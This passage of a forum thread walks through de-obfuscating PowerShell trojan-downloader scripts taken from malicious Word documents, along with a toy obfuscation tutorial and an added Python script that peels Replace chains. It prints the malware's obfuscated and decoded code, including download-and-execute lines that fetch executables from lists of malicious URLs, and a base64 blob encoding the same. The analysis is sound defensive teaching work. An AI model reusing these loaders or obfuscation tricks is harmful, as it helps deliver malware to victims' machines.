    eclFile(Fk1abc.ToSecl+ecltring(), FkewVI+wVIcl+ecl1huas);Invokecl+eclewVI+wVI-Iecl+
    ecltem(Fk1ecl+eclhuas)ecl+ecl;becl+eclreecl+eclak;}cecl+eclatch{write-host ecl+eclFk1_.
    Exceecl+eclpecl+eclwVI+wVItion.MessagewVI+wVI;}}ecl)
    .REpLacE((wVI+wVI[cHar]97+[cHar]98+[cHar]79)wVI+wVI,eclJVLecl).RwVI+
    wVIEpLacE(eclFk1ecl,[String][cHar]36).REpLacE(wVI+wVI([cHar]73+[cHar]111+[cHar]wVI+wVI1
    1wVI+wVI2),[StrinwVI+wVIg][cHar]39) ) wVI).rEPlaCe(([ChaR]78+[ChaR]110+
    [ChaR]111),[sTring][ChaR]36).rEPlaCe(([ChaR]101+[ChaR]99+[ChaR]108),[sTring][ChaR]39)
    .rEPlaCe(wVIJVLwVI,wVIz1awVI))'
    .
    Next, we execute in PowerShell:
    Code:
    $Obfuscated.RePlAcE('wVI',"'").RePlAcE('z1a','\').RePlAcE('0hC','$')
    .
    The result:
    & ( $ENV:COMSPEc[4,26,25]-Join'')((' & ( NnopshOme[21]+NnoPsHOMe[30]+
    '+'eclXe'+'cl)'+' ( (eclFk1franc '+'= new-objecl+eclect ecl+eclSysteecl+
    eclm.e'+'cl+eclNeecl+eclt.WebClieecl+eclnt;ecl+eclFecl+eclk1nsadasd = ecl+eclneecl+
    eclw-ecl+eclobecl+ecljeecl+eclct ecl+eclrand'+'om;Fk1becl+eclcecl+ecldecl+ecl = Iecl+
    '+'eclophttecl+eclp:ecl+ecl//xnecl+ecl--ecl+ecl80aecl+eclhecl+eclk9a.xn'+
    'ecl+ecl-ecl+ecl-p1aiecl+ecl/gPh'+'TZQJ/,ecl+eclhttp:/ecl+ecl/beniecl+ecltecl+ecl.ecl
    +'+'eclbiz/eecl+eclsecl+ecluBzzmU/,ecl+eclhtecl+ecltp:ecl+ecl/ecl+ecl/recl+eclemecl+
    ecloec'+'l+eclnecl+eclt-britv.ruecl+ecl/Uecl+eclamuecl+eclKMpuecl+ecl/,e'+
    'cl+ec'+'lhttpecl+ecl://recl+'+'eclemecl+ecloecl+eclntecl+ecl-secl+
    eclhlangov.ru/Q/,htecl+ecltp://www.ecl+eclledpuecl+eclblicecl+eclidecl+eclad.com/jtvsecl+
    eclZO/Iopecl+ecl.ecl+eclSpliecl+ecl'+'t(ecl+eclIecl+eclop,Ioecl+eclp);ecl+eclFk1ecl+
    eclkarapaecl+ecl'+'secl+ecl = Fecl+eclk1ecl+eclnsadasecl+ecld.next(ecl+ecl1, 343245);
    Fecl+eclkecl+ecl1ecl+eclhuas = Fk1eecl+'+'eclnv;puecl+eclblic + ecl+eclIecl+eclopaecl+
    eclbOIopecl+ecl ecl+ecl+ ecl+eclFkecl+ecl1karapasecl+ecl +ecl+ecl Iecl+ecloecl+eclp.ecl+
    eclexeIop;f'+'oreach(Fkecl+ecl1ecl+eclaecl+eclbc ecl+eclinecl+ecl Fecl+eclk1bcd){tryecl+ecl{ecl+eclFk1ecl+eclfrancecl+ecl.Decl+eclownecl+eclloa'+'decl+
    eclFile(Fk1abc.ToSecl+ecltring(), Fke'+'cl+ecl1huas);Invokecl+ecle'+'-Iecl+
    ecltem(Fk1ecl+eclhuas)ecl+ecl;becl+eclreecl+eclak;}cecl+eclatch{write-host ecl+eclFk1_.
    Exceecl+eclpecl+ecl'+'tion.Message'+';}}ecl)
    .REpLacE(('+'[cHar]97+[cHar]98+[cHar]79)'+',eclJVLecl).R'+
    'EpLacE
    (eclFk1ecl,[String][cHar]36).REpLacE('+'([cHar]73+[cHar]111+[cHar]'+'1
    1'+'2),[Strin'+'g][cHar]39) ) ').rEPlaCe(([ChaR]78+[ChaR]110+
    [ChaR]111),[sTring][ChaR]36).rEPlaCe(([ChaR]101+[ChaR]99+[ChaR]108),[sTring][ChaR]39)
    .rEPlaCe('JVL','\'))
    .
    Now, the six REPLACE commands at the end of the above code contain partially de-obfuscated code, so the procedure should be repeated.
    .
    De-Obfuscation Commands2 --> REpLacE(('+'[cHar]97+[cHar]98+[cHar]79)'+',eclJVLecl).R'+
    'EpLacE(eclFk1ecl,[String][cHar]36).REpLacE('+'([cHar]73+[cHar]111+[cHar]'+'1
    1'+'2),[Strin'+'g][cHar]39) ) ').rEPlaCe(([ChaR]78+[ChaR]110+
    [ChaR]111),[sTring][ChaR]36).rEPlaCe(([ChaR]101+[ChaR]99+[ChaR]108),[sTring][ChaR]39)
    .rEPlaCe('JVL','\'))
    .
    Convert ASCII characters and join them:
    De-Obfuscation Commands2 -->
    REpLacE('abO','JVL').REpLacE('Fk1','$').REpLacE('Iop',"'").rEPlaCe('Nno','$').rEPlaCe('ecl',"'").rEPlaCe('JVL','\')
    .
    We can also omit the first command in the main code:
    .
    $ENV:COMSPEc[4,26,25]-Join
    .
    because it is used to join the code, which we will do manually.
    .
    Join the code (omit the "'+'"), and execute in PowerShell:
    Code:
    $MainObfuscatedCode = ' & ( NnopshOme[21]+NnoPsHOMe[30]+
    eclXecl) ( (eclFk1franc = new-objecl+eclect ecl+eclSysteecl+
    eclm.ecl+eclNeecl+eclt.WebClieecl+eclnt;ecl+eclFecl+eclk1nsadasd = ecl+eclneecl+
    eclw-ecl+eclobecl+ecljeecl+eclct ecl+eclrandom;Fk1becl+eclcecl+ecldecl+ecl = Iecl+
    eclophttecl+eclp:ecl+ecl//xnecl+ecl--ecl+ecl80aecl+eclhecl+eclk9a.xn'+
    'ecl+ecl-ecl+ecl-p1aiecl+ecl/gPhTZQJ/,ecl+eclhttp:/ecl+ecl/beniecl+ecltecl+ecl.ecl+
    eclbiz/eecl+eclsecl+ecluBzzmU/,ecl+eclhtecl+ecltp:ecl+ecl/ecl+ecl/recl+eclemecl+
    ecloecl+eclnecl+eclt-britv.ruecl+ecl/Uecl+eclamuecl+eclKMpuecl+ecl/,ecl+eclhttpecl+
    ecl://recl+eclemecl+ecloecl+eclntecl+ecl-secl+eclhlangov.ru/Q/,htecl+ecltp://www.ecl+
    eclledpuecl+eclblicecl+eclidecl+eclad.com/jtvsecl+eclZO/Iopecl+ecl.ecl+eclSpliecl+
    eclt(ecl+eclIecl+eclop,Ioecl+eclp);ecl+eclFk1ecl+eclkarapaecl+eclsecl+ecl = Fecl+
    eclk1ecl+eclnsadasecl+ecld.next(ecl+ecl1, 343245);Fecl+eclkecl+ecl1ecl+
    eclhuas = Fk1eecl+eclnv:puecl+eclblic + ecl+eclIecl+eclopaecl+eclbOIopecl+ecl ecl+
    ecl+ ecl+eclFkecl+ecl1karapasecl+ecl +ecl+ecl Iecl+ecloecl+eclp.ecl+
    eclexeIop;foreach(Fkecl+ecl1ecl+eclaecl+eclbc ecl+eclinecl+ecl Fecl+eclk1bcd){tryecl+
    ecl{ecl+eclFk1ecl+eclfrancecl+ecl.Decl+eclownecl+eclloadecl+
    eclFile(Fk1abc.ToSecl+ecltring(), Fkecl+ecl1huas);Invokecl+ecle-Iecl+
    ecltem(Fk1ecl+eclhuas)ecl+ecl;becl+eclreecl+eclak;}cecl+
    eclatch{write-host ecl+eclFk1_.Exceecl+eclpecl+ecltion.Message;}}ecl)'
    
    $MainObfuscatedCode.REpLacE('abO','JVL').REpLacE('Fk1','$').REpLacE('Iop',"'").rEPlaCe('Nno','$').rEPlaCe('ecl',"'").rEPlaCe('JVL','\')
    
    .
    The result:
    & ( $pshOme[21]+$PsHOMe[30]+
    'X') ( ('$franc = new-obj'+'ect '+'Syste'+
    'm.'+'Ne'+'t.WebClie'+'nt;'+'F'+'k1nsadasd = '+'ne'+
    'w-'+'ob'+'je'+'ct '+'random;$b'+'c'+'d'+' = I'+
    'ophtt'+'p:'+'//xn'+'--'+'80a'+'h'+'k9a.xn'+'-'+'-p1ai'+'/gPhTZQJ/,'+'http:/'+'/beni'+'t'+'.'+
    'biz/e'+'s'+'uBzzmU/,'+'ht'+'tp:'+'/'+'/r'+'em'+
    'o'+'n'+'t-britv.ru'+'/U'+'amu'+'KMpu'+'/,'+'http'+
    '://r'+'em'+'o'+'nt'+'-s'+'hlangov.ru/Q/,ht'+'tp://www.'+
    'ledpu'+'blic'+'id'+'ad.com/jtvs'+'ZO/''+'.'+'Spli'+
    't('+'I'+'op,Io'+'p);'+'$'+'karapa'+'s'+' = F'+
    'k1'+'nsadas'+'d.next('+'1, 343245);F'+'k'+'1'+
    'huas = $e'+'nv;pu'+'blic + '+'I'+'opa'+'bO''+' '+
    '+ '+'Fk'+'1karapas'+' +'+' I'+'o'+'p.'+
    'exe';foreach(Fk'+'1'+'a'+'bc '+'in'+' F'+'k1bcd){try'+
    '{'+'$'+'franc'+'.D'+'own'+'load'+
    'File($abc.ToS'+'tring(), Fk'+'1huas);Invok'+'e-I'+
    'tem($'+'huas)'+';b'+'re'+'ak;}c'+
    'atch{write-host '+'$_.Exce'+'p'+'tion.Message;}}')
    .
    Now we will again join the code (omit "'+'"), and the result is as follows:
    & ( $pshOme[21]+$PsHOMe[30]+'X') ( ('$franc = new-object System.Net.WebClient;
    Fk1nsadasd = new-object random;$bcd = Iophttp://xn--80ahk9a.xn--p1ai/gPhTZQJ/,
    http://benit.biz/esuBzzmU/,http://remont-britv.ru/UamuKMpu/,http://remont-shlangov.ru/Q/,
    http://www.ledpublicidad.com/jtvsZO/'.Split(Iop,Iop);$karapas = Fk1nsadasd.next(1, 343245);
    Fk1huas = $env;public + IopabO' + Fk1karapas + Iop.exe';foreach(Fk1abc in Fk1bcd)
    {try{$franc.DownloadFile($abc.ToString(), Fk1huas);Invoke-Item($huas);break;}
    catch{write-host $_.Exception.Message;}}')
    .
    The first part of the above code is another way to obfuscate the IEX PowerShell command:
    ( $pshOme[21]+$PsHOMe[30]+'X') --> IEX.
    .
    Finally we have to repeat some replacements:
    Iop--> '
    abO --> JVL --> \
    Fk1 --> $
    .
    The final de-obfuscated code:
    IEX ('$franc = new-object System.Net.WebClient;
    $nsadasd = new-object random;$bcd = 'http://xn--80ahk9a.xn--p1ai/gPhTZQJ/,
    http://benit.biz/esuBzzmU/,http://remont-britv.ru/UamuKMpu/,http://remont-shlangov.ru/Q/,
    http://www.ledpublicidad.com/jtvsZO/'.Split(',');$karapas = $nsadasd.next(1, 343245);
    $huas = $env;public + '\' + $karapas + '.exe';foreach($abc in $bcd)
    {try{$franc.DownloadFile($abc.ToString(), $huas);Invoke-Item($huas);break;}
    catch{write-host $_.Exception.Message;}}')
    .
    The code was so obfuscated that those malicious websites were hidden in hybrid-analysis.:)
     
  17. Andy Ful

    #17 Andy Ful, Nov 13, 2017
    Last edited: Nov 13, 2017
    My previous post on the real world example was probably too complex for many readers. So, I prepared here the super-light version of it, that uses most of the techniques adopted by the malware.
    .
    Let's start with the most simple command in the PowerShell console:
    Code:
    Write-Host Hello
    It shows the result:
    Hello
    .
    The same can be done using the string that contains the whole command, which can be executed by IEX (Invoke-Expression cmdlet):
    Code:
    IEX 'Write-Host Hello'
    or placing the IEX on the right side:
    Code:
    'Write-Host Hello' | IEX
    .
    IEX can run the content of more complex strings, for example:
    Code:
    $string = "IEX 'Write-Host Hello'"
    IEX $string
    or placing the IEX on the right side:
    Code:
    $string = "IEX 'Write-Host Hello'"
    $String | IEX
    Still, the result will be:
    Hello
    .
    The string "IEX 'Write-Host Hello'" can be obfuscated in many ways, for example by using some Replace commands:
    Code:
    $ObfuscatedString = "IEX 'Say Hello'"
    $ObfuscatedString.Replace('Say','Write-Host') | IEX
    or in the opened form:
    Code:
    "IEX 'Say Hello'".Replace('Say','Write-Host') | IEX
    We can still get the same result:
    Hello
    .
    Now, it is time to obfuscate IEX and Replace commands in the string:
    Code:
    "REX 'Say Hello'.NewYork('Say','Write-Host')".Replace('R', 'I').Replace('NewYork','Replace') | IEX
    The result is as before:
    Hello
    .
    To make this more complex let's use IEX replacement --> .( $env:pUbLic[13]+$env:puBlIc[5]+'X') :
    (the smiling face hides the ':' and 'p' characters):
    Code:
    "REX 'Say Hello'.NewYork('Say','Write-Host')".Replace('R', 'I').Replace('NewYork','Replace') | .( $env:pUbLic[13]+$env:puBlIc[5]+'X')
    Again, we can see the result:
    Hello
    .
    OK. But, how to de-obfuscate our code:
    Code:
    "REX 'Say Hello'.NewYork('Say','Write-Host')".Replace('R', 'I').Replace('NewYork','Replace') | .( $env:pUbLic[13]+$env:puBlIc[5]+'X')
    .
    First, throw out the execution commands, except those which operate on strings without executing their content. In our case the execution commands are in the last code fragment --> | .( $env:pUbLic[13]+$env:puBlIc[5]+'X')
    .
    The Replace commands are not executing the string content, so they can stay in the code, and the rest of the code is the obfuscated string:
    "REX 'Say Hello'.NewYork('Say','Write-Host')"
    .
    Next use the code to de-obfuscate itself:
    Code:
    $ObfuscatedString = "REX 'Say Hello'.NewYork('Say','Write-Host')"
    $ObfuscatedString.Replace('R', 'I').Replace('NewYork','Replace')
    As the result, you will see partially de-obfuscated code:
    IEX 'Say Hello'.Replace('Say','Write-Host')
    .
    Now, the procedure should be repeated. Use the code without IEX:
    Code:
    $ObfuscatedString ='Say Hello'
    $ObfuscatedString.Replace('Say','Write-Host')
    .
    The final result after de-obfuscation:
    Write-Host Hello
    .
    The obfuscated example is interesting, because the de-obfuscation parts of it (Replace commands) are partially obfuscated. So, de-obfuscation was made in two steps.
    .
    Be safe.:)
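    The two-step peeling described in this post and in the real-world sample of the previous post (#16), as an added example written in Python rather than taken from the thread: it applies the Replace chain to the string, drops the disguised IEX instead of running it, and repeats while the result still has the same shape. The snippet it processes is the super-light one above; the regular expressions and the IEX-detection heuristic are this example's own assumptions.

```python
import re

# Added example, not the thread's code: peel the Replace-chain layers the way the posts
# do by hand, without executing anything.  The snippet is parsed as
#     "<literal>".Replace(old,new).Replace(old,new)... <executor>
# where each argument may be a quoted string, [char]N, or a sum of those (optionally
# wrapped in parentheses and prefixed with [string]).  The replacements are applied to
# the literal, the executor (IEX in any disguise) is reported and dropped, a leading
# IEX is stripped from the result, and the procedure repeats while the result still
# has the same shape.  The -replace/-creplace operator form is not handled.

_TERM = r"(?:\[string\]\s*)?(?:'[^']*'|\"[^\"]*\"|\[char\]\s*\d+)"
_ARG = r"\(?\s*" + _TERM + r"(?:\s*\+\s*" + _TERM + r")*\s*\)?"
LITERAL_RE = re.compile(r"^\s*(?:'([^']*)'|\"([^\"]*)\")")
REPLACE_RE = re.compile(
    r"\s*\.\s*c?replace\s*\(\s*(" + _ARG + r")\s*,\s*(" + _ARG + r")\s*\)", re.I)
TERM_RE = re.compile(r"'([^']*)'|\"([^\"]*)\"|\[char\]\s*(\d+)", re.I)
IEX_STRIP_RE = re.compile(r"^\s*(?:iex|invoke-expression)\s+", re.I)
# IEX spelled out, or the "$var[13]+$var[5]+'X'" trick that spells it from a variable
IEX_LIKE_RE = re.compile(
    r"\b(?:iex|invoke-expression)\b|\$\w+(?::\w+)?\[\d+\]\s*\+.*\+\s*['\"]x['\"]", re.I)


def _eval_arg(arg):
    """Evaluate a Replace argument: 'wVI', ([CHar]119+[CHar]86+[CHar]73), [STRiNG][CHar]39."""
    out = []
    for m in TERM_RE.finditer(arg):
        if m.group(3) is not None:
            out.append(chr(int(m.group(3))))
        elif m.group(2) is not None:
            out.append(m.group(2))
        else:
            out.append(m.group(1))
    return "".join(out)


def parse_snippet(snippet):
    """Return (literal, [(old, new), ...], executor_tail) or None if no leading literal."""
    lit = LITERAL_RE.match(snippet)
    if not lit:
        return None
    literal = lit.group(1) if lit.group(1) is not None else lit.group(2)
    pos, pairs = lit.end(), []
    while True:
        m = REPLACE_RE.match(snippet, pos)
        if not m:
            break
        pairs.append((_eval_arg(m.group(1)), _eval_arg(m.group(2))))
        pos = m.end()
    return literal, pairs, snippet[pos:].strip()


def is_iex_like(tail):
    return bool(IEX_LIKE_RE.search(tail))


def resolve_replace_chain(snippet, max_rounds=10):
    """Return (final_text, steps); each step is (pairs, executor_tail, tail_is_iex)."""
    steps = []
    for _ in range(max_rounds):
        parsed = parse_snippet(snippet)
        if parsed is None:
            break
        literal, pairs, tail = parsed
        if not pairs and not tail:
            break                                  # a bare string: nothing left to peel
        for old, new in pairs:
            literal = literal.replace(old, new)    # .NET String.Replace is case-sensitive
        steps.append((pairs, tail, is_iex_like(tail)))
        snippet = IEX_STRIP_RE.sub("", literal.strip())
    return snippet, steps


# The super-light example from the post, with its disguised IEX at the end.
SAMPLE = ("\"REX 'Say Hello'.NewYork('Say','Write-Host')\".Replace('R', 'I')"
          ".Replace('NewYork','Replace') | .( $env:pUbLic[13]+$env:puBlIc[5]+'X')")

if __name__ == "__main__":
    final, steps = resolve_replace_chain(SAMPLE)
    for pairs, tail, iex in steps:
        print("replacements:", pairs, "| executor dropped:", tail or "-", "| IEX-like:", iex)
    print("result:", final)
```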
     
  18. Andy Ful

    The example from Malware Samples 14-11-17 #10
    whmpqn.doc
    Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'whmpqn.doc'
    I do not know why hybrid-analysis.com did not decode the PowerShell commands of this malware sample.
    So, I decoded it manually:
    Code:
    $text='IAAoAG4ARQB3AC0AbwBCAEoAZQBjAFQAIABTAFkAcwBUAEUAbQAuAE4ARQB0AC4AdwBlAEIAYwBMAEkARQBOAFQAKQAuAEQAbwBXAG4ATABPAGEAZABmAGkAbABFACgAIAAdIGgAdAB0AHAAOgAvAC8AYQBjAGgAYQByAHkAYQBnAHIAbwB1AHAALgBuAGUAdAAvAGkAbQBhAGcAZQBzAC8AdQBzAGEALgBlAHgAZQAdICAALAAgAB0gJABlAE4AVgA6AEEAcABwAGQAYQBUAGEAXAB3AGkAbgBkAG8AdwBzAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAYQBwAHAAZABhAHQAYQBcAHcAaQBuAGQAbwB3AHMALgBlAHgAZQAdIA=='
    
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($text))
    The decoded PowerShell commands:
    .
    (nEw-oBJecT SYsTEm.NEt.weBcLIENT).DoWnLOadfilE( ”http://aaaaa.net/images/usa.exe” , ”$eNV:AppdaTa\windows.exe” ) ; sTArT ”$Env:appdata\windows.exe”
    .
    So, the payload is downloaded from a malicious website to disk (%APPDATA%\windows.exe), and then executed from this location.
     
  19. Andy Ful

    Malware Samples 16-11-17 #11
    UPS_ 24046767971_SYZ-ZKO (16 Nov 17).doc
    Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'UPS_ 24046767971_SYZ-ZKO (16 Nov 17).doc'
    .
    The PowerShell code can be found in 'Hybrid Analysis' section (last code block).
    Here is the interesting part:
    .
    Iex 38bsJjVC5sJj+sJjfranc =sJj38b+38b+sJj newsJj+sJj-osJj+sJjbjesJj+sJjct sJj+sJjSystem.NsJj+sJjet.WebsJj+sJjCs38b+38bJj+s38b+38bJjliesJj+sJjnt;VC5sJj+sJjnsJj+sJjssJj+sJjadsJj+sJj38b+38basJj+sJjsd =sJj+sJj new-sJj+sJjobject rans38b+38bJj+sJjdom;Vs38b+38bJj+sJjC5bcsJj+sJjd =38b+38bsJj+sJj ZIsJj+sJj38b+38bxhttp:/sJj+sJj/sJj+sJjcamdoyenvien.sJj+sJjcomsJj+s38b+38bJj/TFb/,hsJj+sJjttp:sJj+sJj//me38b+38bgustasJj+sJjse38b+38bsJj+sJjrcsJj+s38b+38bJjosJj+sJjach.com/J/,htsJj+sJjtsJj38b+38b+sJjp://tesJj+sJjst.m1kasJj+sJjelsJj+sJj.ru/NrsJj+sJjtWVsJj+sJjfs/,httsJj+sJjp:38b+38bsJj+sJj//expsJj+sJjertmesJj+sJjdisJ38b+38bj+sJjator.sJj+sJjca/S/,hsJj+sJjt38b+38bsJj+sJjtp://sJj+sJjtsJj+sJjrosJj+sJjvatosJj+sJjurssJj+sJj.sJj+sJj38b+38bessJj+sJj/j/ZIsJj+sJjx.SplitsJj+sJjZsJj+sJ38b+38bj38b+38bIs38b+38bJj+sJjx,ZIxsJj+sJj;VC5k38b+38barasJ38b+38bj+sJ38b+38bjpasJj+sJjs sJj+sJj= VC5nsadassJj+sJjd.sJj+sJjnsJj+sJjexsJj+sJjtsJj+sJj1sJj+sJj, 3sJj+sJj43245sJj+sJj;VC538b+38bsJj+sJjhuassJj+sJj sJj+sJ38b+38bj= VC5esJj+sJjnv;public s38b+38bJj+sJj+sJj+sJj ZIsJj+sJjx4MnZIx + VsJj+sJjCsJj+sJj5karapsJj+sJjas sJj+sJj+ s38b+38bJj+sJjZs38b+38bJj+sJjIsJj+sJjx.esJj+sJjxesJj+sJjZsJj+sJjIxsJj+sJj;sJj+sJjfosJj38b+38b+sJjreachsJj+38b+38bsJjVC5absJj+sJjc sJj+sJj38b+38bin V38b+38bC5sJj+sJjbsJj+sJjcdsJj+sJj{tsJj+sJjry{V38b+38bCsJj+s38b+38bJj5fsJj+sJjrasJj+sJjn38b+38bc.DownsJj+sJjlsJj+sJjoasJj+sJjdFilesJj+sJjVC5asJj+sJjbsJj+sJjc.Ts38b+38bJj+sJjoStsJj+sJjrinsJj+sJjgs38b+38bJj+sJjsJj+sJj, VsJj+sJj38b+38bC5sJj+sJjhusJj+sJjassJj+sJj;InsJ38b+38bj+sJjvoke-Ite38b+38bmsJj+sJjVsJj+sJjC5huas;break;}catch{writ38b+38be-hosJj+sJjstsJj+sJj VC5sJj+sJj_.EsJj+sJjxceptsJj+sJjisJj+sJjon.Message;}}sJj -cREpL38b+38bace 'V'+[cHar]67+'5','$'-cREp38b+38bLace'4Mn','\'-rePLace sJjZIxsJj,''' t38b+38bh38b+38bw . g38b+38ba0ShellID[1]+ga0ShelLId[13]+sJjxsJj38b.rePlaCE'ga'+[CHAr]48,[stRinG][CHAr]36.rePlaCE[CHAr]115+'Jj','''.rePlaCE38bthw38b,'|''-cREPlaCE'38b','''
    .
    The 7 REPLACE commands were bolded, and the obfuscated IEX (Invoke-Expression cmdlet) was written in red.
    The decoding part is very similar to the malware from my previous post How-to Guide - How to de-obfuscate PowerShell script commands (Examples)., so below is a maximally shortened version of the three de-obfuscation stages (details omitted):
    .
    Stage 1
    Omit the Iex (first command), and represent the above code block in the form: $text.REPLACE('38b',"'")
    Execute in PowerShell console:
    $text.REPLACE('38b',"'")
    Decode ASCII chars in REPLACE commands. Join the code.
    .
    Stage 2
    Represent the results of 'Stage 1' in the form: $text1.REPLACE('ga0','$').REPLACE('sJj',"'").REPLACE('thw','|')
    Execute in PowerShell console:
    $text1.REPLACE('ga0','$').REPLACE('sJj',"'").REPLACE('thw','|')
    Join the code.
    .
    Stage 3
    Omit the | . 'IEX' replacement | .$ShellID[1]+$ShelLId[13]+'x'
    Represent the results of 'Stage 2' in the form: $text2.REPLACE('VC5','$').REPLACE('4Mn','\').REPLACE( 'ZIx',"'")
    Execute in PowerShell console:
    $text2.REPLACE('VC5','$').REPLACE('4Mn','\').REPLACE( 'ZIx',"'")
    Join the code.
    .
    The result:
    .
    $franc = new-object System.Net.WebClient; $nsadasd = new-object random; $bcd = 'hxxx;//camdoyenvien.com/TFb/,hxxx;//megustasercoach.com/J/,hxxx;//test.m1kael.ru/NrtWVfs/,hxxx;//expertmediator.ca/S/,hxxx;//trovatours.es/j/'.Split(','); $karapas = $nsadasd.next(1, 343245); $huas = $env;public + '\' + $karapas + '.exe'; foreach $abc in $bcd {try{$franc.DownloadFile$abc.ToString, $huas; Invoke-Item $huas; break;}catch{write-host $_.Exception.Message;}}
    .
    The above code is almost identical to the final code of the malware from the previous post.
     
  20. Andy Ful

    #20 Andy Ful, Dec 15, 2017
    Last edited: Dec 15, 2017
    Malware Pack (20+) 15.12.2017 - #24
    Invoice.doc
    Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'Invoice.doc'
    .
    I had a break because there was nothing new in obfuscated scripts. So, maybe it would be interesting to look at a simple de-obfuscation method for REPLACE obfuscation.
    The method is the simplest one. We take a look at the obfuscated script and delete the most frequent repetitions which are not native to PowerShell code.
    .
    Code:
    powershell "((' ((Vpa (A64Y0A64+A64QfranAVpa+Vpa64+A64c =
    Vpa+Vpa neA64+A64wA64+A64-'+'A64+A64objA64+A64ectA64+A64
    SyA64+A64s'+'A6'+'4+A64teA64+A64m.NeA64+A64t.A64+A64WebCA64+A6'+'4lienA64+A64t;Y0QnsadasA64+A64d = new-oA64+A64bject randoA64+A64mA64+A64;YA64+A6'+'40QbcdA64+A64 A64+A64=
    7BkhttpA64+AVpa+Vpa64://vi'+'n-diA64+A64ng-rijA64+A64k.nl/zNUvgA64+A64'+'HA64+A64/A64+A64,
    '+'http://ep'+'rA64+A6Vpa+Vpa4oA64+A64tuA64+A64tA64'+'+A64oA64+A64Vpa+VparsA64Vpa'+'+Vpa+A64.
    coA64+A64m/7UA64+A64doA64+A64/AVpa+Vpa64+A64,httpA64+A64:A64+A64//crA64+A64eumAVpa+Vpa64
    +A64atproA64+AVpa+Vpa64pertiA'+'64+A'+'Vpa+Vpa64es.com/nUvMA64+A64E/,hA64'+'+A64ttpA6'+'4+A64:
    A64+A64//perfA64+A64ecA64+A64tprA64+A64essing.nVpa+VpaeA64+AVpa+Vpa64t/HVp'+'a+VpaB'+'h0/,htA6'+'4+
    A64tA64+A64p:/A64+Vpa+VpaA64/A64+A64pA64+A64lat'+'foA64+A64rmf.Vpa+VpaA64+A64nl/Vpa+VpayA64+
    A64jYFA64+A64LA64+AVpa+Vpa'+'6406/7Bk.A64+'+'A6'+'4SA64+A64pA64+A64lA64+A64iA6Vpa+Vpa4+A64tA64
    +A64'+'(7Bk,7BA64+A64k);Y'+'Vpa+Vpa0QkA64+A64Vpa+V'+'paarapA64+A64asA64Vpa+Vpa+A64
    A64+A6Vpa+Vpa4= A64+A64Y0QnsadA64+A64aVpa+VpaA64'+'+A64sd.nA64+A64ext
    (A6Vpa+Vpa4+A641A64+A64, 3A64+A6443245A64+A64);YA64+A640QhuA64+A64as =A64+A64
    Y0QeA64+A64nvA64+A64:pA64+A64'+'ubli'+'c + A64+A647BkA6Vpa+Vpa4+A64CpVpa+VpaA64+A6447Bk
    A6Vpa+Vpa4+'+'A64+A64'+'+A64 Y'+'A64+A6Vpa'+'+Vpa40Q'+'ka'+'rapa'+'sA64+A64 + 7Bk.exe7Bk;foreach
    (Y0QA64+A64abc A64+A64iA64+A64nA64+A64 '+'YA64+A640'+'QA64+A64bc'+'d)'+'A64+A64{tryA64+A64
    {Y0QfA64'+'+A'+'64'+'rA64+A64an'+'cA6'+'4+A64.DowA6Vpa+Vpa4+A64nlA64+A64oadFile
    (Y0Qabc.ToStVpa+VparA64+A64iA64+AVpa+V'+'pa64n'+'g(), Y0'+'QA64+A64hAV'+'pa
    +Vpa64+Vpa+VpaA64Vpa+Vpauas);In'+'vA64'+'+A64oke-Vpa+VpaIVp'+'a+VpatA64+A64em
    (YA64+A640QhA64+A64uVpa+VpaaA64Vpa+Vpa'+'+A64s)A64+A64;br'+'eaA64+A64k;}ca'+'tch
    {A64+A64wriVp'+'a+VpaA64+A6Vpa+Vpa4te-host
    Y'+'0A'+'64+A64Q_.A64+A64ExceptA64+A64ion.MessA64+A64age;}}A64).RePlAcE(([cVpa+VpahaR]89+
    [chVpa'+'+VpaaR]48+[chaR]81),[sTrING][chaR]36).RePlAcE(([chaR]67+[Vpa+VpachaR]112+Vpa+Vpa[chaR]
    52),AVpa+Vpa64p87A64Vpa+Vpa).RePlAcE(([chaR]5Vpa+Vpa5+[chaR]66+[chaR]107),[sTrING]
    ['+'chaVpa+VpaR]39)CLE. ( xPbsHeLLid[1]+xPbSheLlId[13]+A64xA64)Vpa) -CREpLacE VpaCLEVpa,[CHar]
    124 -RePlaCe Vpap87'+'Vpa,[CHar]92 -CREpLa'+'cE([CHar]120+[CHar]80+[CHar]98),['+'CHar]36 -
    CREpLacE VpaA64Vpa,[CHar]39) QmWIex')-REPLaCe 'QmW',[CHar]124 -crepLace'Vpa',[CHar]39) |& (
    $pSHoMe[4]+$PSHOMe[34]+'X')
    So let's begin. There are many occurrences of A64, Vpa, '+', + and some others. We may copy the above code (up to the first Replace command) to a TXT file in Notepad and use the Replace feature in Notepad to delete the occurrences:

    .
    Replace '+' with nothing
    Replace + with nothing
    Replace A64 with nothing
    Replace Vpa with nothing
    Replace 7Bk with nothing
    Replace Y0Q with nothing
    Replace AVp with nothing
    Repeat the above if necessary.

    .
    The result:
    powershell "((' (( (franc = new-object System.Net.WebClient;nsadasd = new-object random;bcd = http://vin-ding-rijk.nl/zNUvgH/,hxxp://eprotutors.com/7Udo/,http://creumAtproperties.com/nUvME/,hxxp://perfectpressing.net/HBh0/,hxxp://platformf.nl/yjYFL06/.Split(,);karapas = nsadasd.next(1, 343245);huas = env;public Cp4 karapas .exe;foreach(abc in bcd){try{franc.DownloadFile(abc.ToString(), huas);Invoke-Item(huas);break;}catch{write-host _.Exception.Message;}});
    .
    It is not code that could be run, but we can see all the interesting features. The script after de-obfuscation looks identical (except for the links to malicious websites) to the script from the previous post.
    The bolded code fragments mean that the script uses the System.Net.WebClient.DownloadFile command to download randomly (new-object random) the payload from one of the malicious websites, and executes it. So, this is the well known trojan downloader:)
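    The Notepad procedure above (strip the concatenation glue, then delete the junk tokens, repeat until stable) can be scripted so that an analyst gets the same readable text offline and also learns what each junk token stood for. The following is an added example written for this thread, not code from the post or from the sample; the obfuscated string it works on is a constructed, harmless Write-Host command wrapped in the same junk-token scheme (A64, Vpa, 7Bk plus `'+'` splits and one `.RePlAcE((chars),chars)` clause), so no part of the real downloader is reproduced here. The token length (3) and the minimum count (3) are assumptions that fit this scheme; both are parameters.

```python
import re
from collections import Counter

# Constructed sample (added for this example, not the script from the post):
# a harmless Write-Host command wrapped in the same junk-token plus
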